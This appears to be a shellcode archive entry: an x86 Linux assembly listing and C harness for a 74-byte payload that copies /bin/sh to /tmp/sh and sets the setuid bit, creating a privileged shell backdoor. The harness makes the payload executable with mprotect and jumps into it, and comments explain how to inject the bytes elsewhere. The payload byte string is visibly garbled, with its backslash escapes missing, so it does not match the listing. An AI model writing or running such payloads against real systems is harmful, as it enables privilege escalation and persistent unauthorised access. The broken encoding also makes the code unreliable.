/*

Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setuid

Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setuid
Tested On: Ubuntu 14.04
Arch: x86
Size: 74 bytes

Shellcode is register independent and null free. Two caveats for anyone lifting the bytes out of this harness: the trailing command string is not NUL-terminated within the 74 bytes (the C string literal below supplies the terminator that execve()'s argv[2] needs, so an injected copy must be followed by a 0x00 byte or the command runs on into whatever memory follows), and "chmod +s" only buys a privileged shell if the process running the payload already has euid 0 — cp creates /tmp/sh owned by the invoking user, so the setuid/setgid bits on it confer nothing the caller did not already have, and a /tmp mounted nosuid ignores the bits entirely.

global _start

section .text
_start:

push 0xb ; execve()
pop eax ;
cdq ; sign-extend eax (0xb, positive) into edx -> edx = 0 without a null byte in the encoding; edx doubles as envp = NULL
push edx ; NULL
push word 0x632d ; "c-"
mov edi,esp ; point edi to stack
push edx ; NULL
push 0x68732f2f ; "hs//"
push 0x6e69622f ; "/bin"
mov ebx,esp ; point ebx to stack
push edx ; NULL

jmp short cmd

execute:

push edi ; "c-"
push ebx ; "/bin/sh"
mov ecx,esp ; point to stack
int 0x80 ; execve(ebx, ecx, edx); on success this never returns. On failure eax = -errno and execution falls through into cmd: below, which calls execute again -- there is no exit path, each pass pushes three more dwords until the process faults


cmd:
call execute
db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
*/

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

unsigned char code[] =
"x6ax0bx58x99x52x66x68x2dx63x89xe7x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52xebx06x57x53x89xe1xcdx80xe8xf5xffxffxffx63x70x20x2fx62x69x6ex2fx73x68x20x2fx74x6dx70x2fx73x68x3bx20x63x68x6dx6fx64x20x2bx73x20x2fx74x6dx70x2fx73x68";
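/*
 * Test harness for the listing above.
 *
 * WARNING: running this copies /bin/sh to /tmp/sh and sets the setuid/setgid
 * bits on the copy (see the command string in `code`). Run it only on a
 * disposable test system.
 *
 * Control flow: ret() jumps into `code`, which issues execve(); on success the
 * process image is replaced and nothing after ret() runs. If execve() fails the
 * listing has no exit path (the int 0x80 falls through into "call execute"
 * again), so a failure shows up as a crash rather than as a return from ret().
 */
int main(void)
{
    size_t len = strlen((const char *)code);

    /* strlen() stops at the first NUL byte, so a printed length below 74
     * means the payload contains a null and would be truncated by a string
     * copy. size_t needs %zu, not %d. */
    printf("Shellcode Length: %zu\n", len);
    /* execve() replaces the process image; flush now or buffered stdio
     * output is silently lost. */
    fflush(stdout);

    /* `code` lives in a writable, ordinarily non-executable data page. Mark
     * the page range holding it (plus its trailing NUL) executable here
     * rather than relying on a build flag such as -z execstack. */
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t start = (uintptr_t)code & ~(page - 1);
    uintptr_t end = (uintptr_t)code + len + 1;
    if (mprotect((void *)start, (size_t)(end - start),
                 PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    int (*ret)(void) = (int (*)(void))code;
    ret();

    /* Only reached if the payload returns, which the listing never does. */
    return 0;
}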